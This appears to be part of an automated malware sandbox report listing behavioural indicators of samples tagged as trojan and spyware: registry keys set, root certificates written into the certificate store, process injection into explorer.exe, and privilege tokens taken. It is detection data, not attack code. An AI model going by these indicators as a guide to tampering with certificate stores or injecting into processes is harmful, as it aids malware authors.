Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs	5D47.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-282 = "Central Europe Standard Time"	5D47.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	5D47.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My	5D47.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-581 = "North Asia East Daylight Time"	5D47.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-271 = "Greenwich Daylight Time"	5D47.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-232 = "Hawaiian Standard Time"	5D47.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-335 = "Jordan Standard Time"	5D47.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-522 = "N. Central Asia Standard Time"	5D47.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates	5D47.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-434 = "Georgian Daylight Time"	5D47.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-231 = "Hawaiian Daylight Time"	5D47.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-242 = "Samoa Standard Time"	5D47.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-381 = "South Africa Daylight Time"	5D47.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-151 = "Central America Daylight Time"	5D47.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-435 = "Georgian Standard Time"	5D47.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-452 = "Caucasus Standard Time"	5D47.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-731 = "Fiji Daylight Time"	5D47.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-431 = "Iran Daylight Time"	5D47.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs	5D47.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-111 = "Eastern Daylight Time"	5D47.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-334 = "Jordan Daylight Time"	5D47.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-771 = "Montevideo Daylight Time"	5D47.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-582 = "North Asia East Standard Time"	5D47.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-385 = "Namibia Standard Time"	5D47.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-1021 = "Bangladesh Daylight Time"	5D47.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-491 = "India Daylight Time"	5D47.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-291 = "Central European Daylight Time"	5D47.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-272 = "Greenwich Standard Time"	5D47.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-91 = "Pacific SA Daylight Time"	5D47.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-831 = "SA Eastern Daylight Time"	5D47.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-912 = "Mauritius Standard Time"	5D47.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-211 = "Pacific Daylight Time"	5D47.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-301 = "Romance Daylight Time"	5D47.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-792 = "SA Western Standard Time"	5D47.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-512 = "Central Asia Standard Time"	5D47.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-572 = "China Standard Time"	5D47.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-412 = "E. Africa Standard Time"	5D47.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-672 = "AUS Eastern Standard Time"	5D47.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-451 = "Caucasus Daylight Time"	5D47.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-261 = "GMT Daylight Time"	5D47.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-182 = "Mountain Standard Time (Mexico)"	5D47.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs	5D47.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	5D47.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-511 = "Central Asia Daylight Time"	5D47.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-521 = "N. Central Asia Daylight Time"	5D47.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-342 = "Egypt Standard Time"	5D47.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-302 = "Romance Standard Time"	5D47.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	5D47.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-651 = "AUS Central Daylight Time"	5D47.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	5D47.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-1041 = "Ulaanbaatar Daylight Time"	5D47.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-462 = "Afghanistan Standard Time"	5D47.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-201 = "US Mountain Daylight Time"	5D47.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs	5D47.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-371 = "Jerusalem Daylight Time"	5D47.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	5D47.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-622 = "Korea Standard Time"	5D47.exe

Modifies system certificate store 2 TTPs 9 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436	7F87.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde	7F87.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	7F87.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13	5D47.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	487C.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	487C.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	5D47.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	487C.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	7F87.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

pid	Process
1476	toolspab1.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1368	toolspab2 (23).exe
1368	toolspab2 (23).exe
1240	Process not Found
1240	Process not Found
1240	Process not Found
1240	Process not Found
1240	Process not Found
1240	Process not Found
1240	Process not Found
1240	Process not Found
1240	Process not Found
1240	Process not Found
1240	Process not Found
1240	Process not Found
1240	Process not Found
1240	Process not Found
1240	Process not Found
1240	Process not Found
1240	Process not Found
1240	Process not Found
1240	Process not Found
1240	Process not Found
1240	Process not Found
1240	Process not Found
1240	Process not Found
1240	Process not Found
1240	Process not Found
1240	Process not Found
1240	Process not Found
1240	Process not Found
1240	Process not Found
1240	Process not Found
1240	Process not Found
1240	Process not Found
1240	Process not Found
1240	Process not Found
1240	Process not Found
1240	Process not Found
1240	Process not Found
1240	Process not Found
1240	Process not Found
1240	Process not Found
1240	Process not Found
1240	Process not Found
1240	Process not Found
1240	Process not Found
1240	Process not Found
1240	Process not Found
1240	Process not Found
1240	Process not Found
1240	Process not Found
1240	Process not Found
1240	Process not Found
1240	Process not Found
1240	Process not Found
1240	Process not Found
1240	Process not Found
1240	Process not Found
1240	Process not Found
1240	Process not Found
1240	Process not Found
1240	Process not Found
1240	Process not Found
1240	Process not Found

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

pid	Process
1240	Process not Found
2556	iexplore.exe

Suspicious behavior: MapViewOfSection 64 IoCs

pid	Process
1368	toolspab2 (23).exe
1240	Process not Found
1240	Process not Found
1240	Process not Found
1240	Process not Found
1240	Process not Found
1240	Process not Found
1240	Process not Found
1240	Process not Found
1240	Process not Found
1240	Process not Found
1240	Process not Found
1240	Process not Found
1240	Process not Found
1240	Process not Found
1240	Process not Found
1240	Process not Found
1240	Process not Found
1240	Process not Found
1736	A8F2.exe
2032	explorer.exe
2032	explorer.exe
316	explorer.exe
316	explorer.exe
1084	explorer.exe
1084	explorer.exe
1660	explorer.exe
1660	explorer.exe
1376	explorer.exe
1376	explorer.exe
1952	explorer.exe
1952	explorer.exe
2636	duebvca
760	irebvca
984	toolspab1.exe
1376	explorer.exe
1376	explorer.exe
1952	explorer.exe
1952	explorer.exe
1660	explorer.exe
1660	explorer.exe
1084	explorer.exe
1084	explorer.exe
316	explorer.exe
316	explorer.exe
2032	explorer.exe
2032	explorer.exe
1660	explorer.exe
1660	explorer.exe
1376	explorer.exe
1376	explorer.exe
1952	explorer.exe
1952	explorer.exe
2336	irebvca
1996	duebvca
1376	explorer.exe
1376	explorer.exe
1952	explorer.exe
1952	explorer.exe
1660	explorer.exe
1660	explorer.exe
1376	explorer.exe
1376	explorer.exe
1952	explorer.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	1240	Process not Found
Token: SeShutdownPrivilege	1240	Process not Found
Token: SeShutdownPrivilege	1240	Process not Found
Token: SeDebugPrivilege	984	733F.exe
Token: SeDebugPrivilege	1364	taskkill.exe
Token: SeShutdownPrivilege	1240	Process not Found
Token: SeShutdownPrivilege	1240	Process not Found
Token: SeCreateTokenPrivilege	1744	7F87.exe
